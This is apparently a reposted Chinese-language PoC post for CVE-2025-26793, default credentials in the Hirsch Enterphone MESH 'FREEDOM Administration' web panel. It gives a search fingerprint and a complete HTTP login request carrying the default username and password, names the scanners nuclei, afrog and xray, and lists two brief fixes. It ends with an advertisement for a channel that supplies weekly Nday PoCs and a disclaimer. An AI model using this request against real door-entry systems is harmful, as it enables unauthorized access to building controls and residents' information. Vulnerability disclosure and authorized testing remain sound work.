Hirsch(前身为Identiv和Viscount)Enterphone MESH的Web GUI配置面板将在2024年之前提供默认凭据。管理员在初始配置时不会被提示更改这些凭据,更改凭据需要许多步骤。攻击者可以通过在互联网上使用这些登录凭据获取用户信息。
title="FREEDOM Administration"
POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 48
formLoginName=freedom&formLoginPassword=viscount
nuclei
afrog
xray
1、关闭互联网暴露面或接口设置访问权限
2、修改默认用户密码
【Nday漏洞实战圈】🛠️
专注公开1day/Nday漏洞复现 · 工具链适配支持
✧━━━━━━━━━━━━━━━━✧
🔍 资源内容
▫️ 整合全网公开Nday漏洞POC详情
▫️ 适配Xray/Afrog/Nuclei检测脚本
▫️ 支持内置与自定义POC目录混合扫描
🔄 更新计划
▫️ 每周新增7-10个实用POC(来源公开平台)
▫️ 所有脚本经过基础测试,降低调试成本
🎯 适用场景
▫️ 企业漏洞自查 ▫️ 渗透测试 ▫️ 红蓝对抗 ▫️ 安全运维
✧━━━━━━━━━━━━━━━━✧
⚠️ 声明:仅限合法授权测试,严禁违规使用!
原文始发于微信公众号(Nday Poc):FREEDOM-Administration 默认密码登录 (CVE-2025-26793)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论